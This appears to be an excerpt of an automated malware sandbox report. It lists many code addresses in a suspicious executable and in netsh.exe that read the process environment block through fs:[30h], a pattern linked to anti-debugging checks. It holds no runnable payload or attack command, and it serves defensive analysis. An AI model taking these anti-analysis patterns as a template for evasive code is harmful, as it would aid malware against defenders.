Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF849B mov eax, dword ptr fs:[00000030h] 2_2_00FF849B
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0100C577 mov eax, dword ptr fs:[00000030h] 2_2_0100C577
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0100C577 mov eax, dword ptr fs:[00000030h] 2_2_0100C577
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01012581 mov eax, dword ptr fs:[00000030h] 2_2_01012581
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01012581 mov eax, dword ptr fs:[00000030h] 2_2_01012581
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01012581 mov eax, dword ptr fs:[00000030h] 2_2_01012581
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01012581 mov eax, dword ptr fs:[00000030h] 2_2_01012581
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101FD9B mov eax, dword ptr fs:[00000030h] 2_2_0101FD9B
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101FD9B mov eax, dword ptr fs:[00000030h] 2_2_0101FD9B
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010135A1 mov eax, dword ptr fs:[00000030h] 2_2_010135A1
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B05AC mov eax, dword ptr fs:[00000030h] 2_2_010B05AC
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B05AC mov eax, dword ptr fs:[00000030h] 2_2_010B05AC
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01011DB5 mov eax, dword ptr fs:[00000030h] 2_2_01011DB5
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01011DB5 mov eax, dword ptr fs:[00000030h] 2_2_01011DB5
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01011DB5 mov eax, dword ptr fs:[00000030h] 2_2_01011DB5
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h] 2_2_01066DC9
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h] 2_2_01066DC9
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h] 2_2_01066DC9
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01066DC9 mov ecx, dword ptr fs:[00000030h] 2_2_01066DC9
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h] 2_2_01066DC9
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01066DC9 mov eax, dword ptr fs:[00000030h] 2_2_01066DC9
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010AFDE2 mov eax, dword ptr fs:[00000030h] 2_2_010AFDE2
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010AFDE2 mov eax, dword ptr fs:[00000030h] 2_2_010AFDE2
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010AFDE2 mov eax, dword ptr fs:[00000030h] 2_2_010AFDE2
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010AFDE2 mov eax, dword ptr fs:[00000030h] 2_2_010AFDE2
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01098DF1 mov eax, dword ptr fs:[00000030h] 2_2_01098DF1
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B740D mov eax, dword ptr fs:[00000030h] 2_2_010B740D
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B740D mov eax, dword ptr fs:[00000030h] 2_2_010B740D
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B740D mov eax, dword ptr fs:[00000030h] 2_2_010B740D
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h] 2_2_010A1C06
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h] 2_2_010A1C06
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h] 2_2_010A1C06
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h] 2_2_010A1C06
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h] 2_2_010A1C06
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h] 2_2_010A1C06
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h] 2_2_010A1C06
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h] 2_2_010A1C06
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h] 2_2_010A1C06
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h] 2_2_010A1C06
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h] 2_2_010A1C06
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h] 2_2_010A1C06
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h] 2_2_010A1C06
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1C06 mov eax, dword ptr fs:[00000030h] 2_2_010A1C06
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01066C0A mov eax, dword ptr fs:[00000030h] 2_2_01066C0A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01066C0A mov eax, dword ptr fs:[00000030h] 2_2_01066C0A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01066C0A mov eax, dword ptr fs:[00000030h] 2_2_01066C0A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01066C0A mov eax, dword ptr fs:[00000030h] 2_2_01066C0A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FFD5E0 mov eax, dword ptr fs:[00000030h] 2_2_00FFD5E0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FFD5E0 mov eax, dword ptr fs:[00000030h] 2_2_00FFD5E0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101BC2C mov eax, dword ptr fs:[00000030h] 2_2_0101BC2C
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101A44B mov eax, dword ptr fs:[00000030h] 2_2_0101A44B
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0107C450 mov eax, dword ptr fs:[00000030h] 2_2_0107C450
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0107C450 mov eax, dword ptr fs:[00000030h] 2_2_0107C450
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0100746D mov eax, dword ptr fs:[00000030h] 2_2_0100746D
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h] 2_2_00FE2D8A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h] 2_2_00FE2D8A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h] 2_2_00FE2D8A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h] 2_2_00FE2D8A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE2D8A mov eax, dword ptr fs:[00000030h] 2_2_00FE2D8A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h] 2_2_00FF3D34
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h] 2_2_00FF3D34
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h] 2_2_00FF3D34
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h] 2_2_00FF3D34
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h] 2_2_00FF3D34
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h] 2_2_00FF3D34
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h] 2_2_00FF3D34
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h] 2_2_00FF3D34
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h] 2_2_00FF3D34
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h] 2_2_00FF3D34
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h] 2_2_00FF3D34
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h] 2_2_00FF3D34
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF3D34 mov eax, dword ptr fs:[00000030h] 2_2_00FF3D34
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEAD30 mov eax, dword ptr fs:[00000030h] 2_2_00FEAD30
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B8CD6 mov eax, dword ptr fs:[00000030h] 2_2_010B8CD6
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A14FB mov eax, dword ptr fs:[00000030h] 2_2_010A14FB
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01066CF0 mov eax, dword ptr fs:[00000030h] 2_2_01066CF0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01066CF0 mov eax, dword ptr fs:[00000030h] 2_2_01066CF0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01066CF0 mov eax, dword ptr fs:[00000030h] 2_2_01066CF0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B070D mov eax, dword ptr fs:[00000030h] 2_2_010B070D
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B070D mov eax, dword ptr fs:[00000030h] 2_2_010B070D
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101A70E mov eax, dword ptr fs:[00000030h] 2_2_0101A70E
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101A70E mov eax, dword ptr fs:[00000030h] 2_2_0101A70E
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0100F716 mov eax, dword ptr fs:[00000030h] 2_2_0100F716
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0107FF10 mov eax, dword ptr fs:[00000030h] 2_2_0107FF10
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0107FF10 mov eax, dword ptr fs:[00000030h] 2_2_0107FF10
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF76E2 mov eax, dword ptr fs:[00000030h] 2_2_00FF76E2
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101E730 mov eax, dword ptr fs:[00000030h] 2_2_0101E730
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B8F6A mov eax, dword ptr fs:[00000030h] 2_2_010B8F6A
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF766D mov eax, dword ptr fs:[00000030h] 2_2_00FF766D
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01067794 mov eax, dword ptr fs:[00000030h] 2_2_01067794
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01067794 mov eax, dword ptr fs:[00000030h] 2_2_01067794
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01067794 mov eax, dword ptr fs:[00000030h] 2_2_01067794
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h] 2_2_00FF7E41
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h] 2_2_00FF7E41
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h] 2_2_00FF7E41
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h] 2_2_00FF7E41
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h] 2_2_00FF7E41
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF7E41 mov eax, dword ptr fs:[00000030h] 2_2_00FF7E41
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEE620 mov eax, dword ptr fs:[00000030h] 2_2_00FEE620
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010237F5 mov eax, dword ptr fs:[00000030h] 2_2_010237F5
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEC600 mov eax, dword ptr fs:[00000030h] 2_2_00FEC600
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEC600 mov eax, dword ptr fs:[00000030h] 2_2_00FEC600
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FEC600 mov eax, dword ptr fs:[00000030h] 2_2_00FEC600
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01018E00 mov eax, dword ptr fs:[00000030h] 2_2_01018E00
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010A1608 mov eax, dword ptr fs:[00000030h] 2_2_010A1608
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101A61C mov eax, dword ptr fs:[00000030h] 2_2_0101A61C
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0101A61C mov eax, dword ptr fs:[00000030h] 2_2_0101A61C
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0109FE3F mov eax, dword ptr fs:[00000030h] 2_2_0109FE3F
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010AAE44 mov eax, dword ptr fs:[00000030h] 2_2_010AAE44
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010AAE44 mov eax, dword ptr fs:[00000030h] 2_2_010AAE44
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FF8794 mov eax, dword ptr fs:[00000030h] 2_2_00FF8794
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h] 2_2_0100AE73
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h] 2_2_0100AE73
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h] 2_2_0100AE73
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h] 2_2_0100AE73
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0100AE73 mov eax, dword ptr fs:[00000030h] 2_2_0100AE73
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0107FE87 mov eax, dword ptr fs:[00000030h] 2_2_0107FE87
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FFFF60 mov eax, dword ptr fs:[00000030h] 2_2_00FFFF60
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010646A7 mov eax, dword ptr fs:[00000030h] 2_2_010646A7
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B0EA5 mov eax, dword ptr fs:[00000030h] 2_2_010B0EA5
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B0EA5 mov eax, dword ptr fs:[00000030h] 2_2_010B0EA5
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B0EA5 mov eax, dword ptr fs:[00000030h] 2_2_010B0EA5
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FFEF40 mov eax, dword ptr fs:[00000030h] 2_2_00FFEF40
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_01028EC7 mov eax, dword ptr fs:[00000030h] 2_2_01028EC7
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_0109FEC0 mov eax, dword ptr fs:[00000030h] 2_2_0109FEC0
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010136CC mov eax, dword ptr fs:[00000030h] 2_2_010136CC
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE4F2E mov eax, dword ptr fs:[00000030h] 2_2_00FE4F2E
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_00FE4F2E mov eax, dword ptr fs:[00000030h] 2_2_00FE4F2E
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010B8ED6 mov eax, dword ptr fs:[00000030h] 2_2_010B8ED6
Source: C:\Users\user\Desktop\cK1g5gckZR9VHjj.exe Code function: 2_2_010116E0 mov ecx, dword ptr fs:[00000030h] 2_2_010116E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0388138A mov eax, dword ptr fs:[00000030h] 12_2_0388138A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F3B7A mov eax, dword ptr fs:[00000030h] 12_2_037F3B7A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F3B7A mov eax, dword ptr fs:[00000030h] 12_2_037F3B7A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0387D380 mov ecx, dword ptr fs:[00000030h] 12_2_0387D380
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037CDB60 mov ecx, dword ptr fs:[00000030h] 12_2_037CDB60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037CF358 mov eax, dword ptr fs:[00000030h] 12_2_037CF358
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03895BA5 mov eax, dword ptr fs:[00000030h] 12_2_03895BA5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037CDB40 mov eax, dword ptr fs:[00000030h] 12_2_037CDB40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038453CA mov eax, dword ptr fs:[00000030h] 12_2_038453CA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_038453CA mov eax, dword ptr fs:[00000030h] 12_2_038453CA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0388131B mov eax, dword ptr fs:[00000030h] 12_2_0388131B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037EDBE9 mov eax, dword ptr fs:[00000030h] 12_2_037EDBE9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h] 12_2_037F03E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h] 12_2_037F03E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h] 12_2_037F03E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h] 12_2_037F03E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h] 12_2_037F03E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F03E2 mov eax, dword ptr fs:[00000030h] 12_2_037F03E2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03898B58 mov eax, dword ptr fs:[00000030h] 12_2_03898B58
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F4BAD mov eax, dword ptr fs:[00000030h] 12_2_037F4BAD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F4BAD mov eax, dword ptr fs:[00000030h] 12_2_037F4BAD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F4BAD mov eax, dword ptr fs:[00000030h] 12_2_037F4BAD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F2397 mov eax, dword ptr fs:[00000030h] 12_2_037F2397
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037FB390 mov eax, dword ptr fs:[00000030h] 12_2_037FB390
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037D1B8F mov eax, dword ptr fs:[00000030h] 12_2_037D1B8F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037D1B8F mov eax, dword ptr fs:[00000030h] 12_2_037D1B8F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h] 12_2_037C9240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h] 12_2_037C9240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h] 12_2_037C9240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037C9240 mov eax, dword ptr fs:[00000030h] 12_2_037C9240
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037E3A1C mov eax, dword ptr fs:[00000030h] 12_2_037E3A1C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037CAA16 mov eax, dword ptr fs:[00000030h] 12_2_037CAA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037CAA16 mov eax, dword ptr fs:[00000030h] 12_2_037CAA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037C5210 mov eax, dword ptr fs:[00000030h] 12_2_037C5210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037C5210 mov ecx, dword ptr fs:[00000030h] 12_2_037C5210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037C5210 mov eax, dword ptr fs:[00000030h] 12_2_037C5210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037C5210 mov eax, dword ptr fs:[00000030h] 12_2_037C5210
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037D8A0A mov eax, dword ptr fs:[00000030h] 12_2_037D8A0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F2AE4 mov eax, dword ptr fs:[00000030h] 12_2_037F2AE4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0388AA16 mov eax, dword ptr fs:[00000030h] 12_2_0388AA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_0388AA16 mov eax, dword ptr fs:[00000030h] 12_2_0388AA16
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03804A2C mov eax, dword ptr fs:[00000030h] 12_2_03804A2C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03804A2C mov eax, dword ptr fs:[00000030h] 12_2_03804A2C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037F2ACB mov eax, dword ptr fs:[00000030h] 12_2_037F2ACB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037DAAB0 mov eax, dword ptr fs:[00000030h] 12_2_037DAAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037DAAB0 mov eax, dword ptr fs:[00000030h] 12_2_037DAAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037FFAB0 mov eax, dword ptr fs:[00000030h] 12_2_037FFAB0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_03854257 mov eax, dword ptr fs:[00000030h] 12_2_03854257
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h] 12_2_037C52A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h] 12_2_037C52A5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 12_2_037C52A5 mov eax, dword ptr fs:[00000030h] 12_2_037C52A5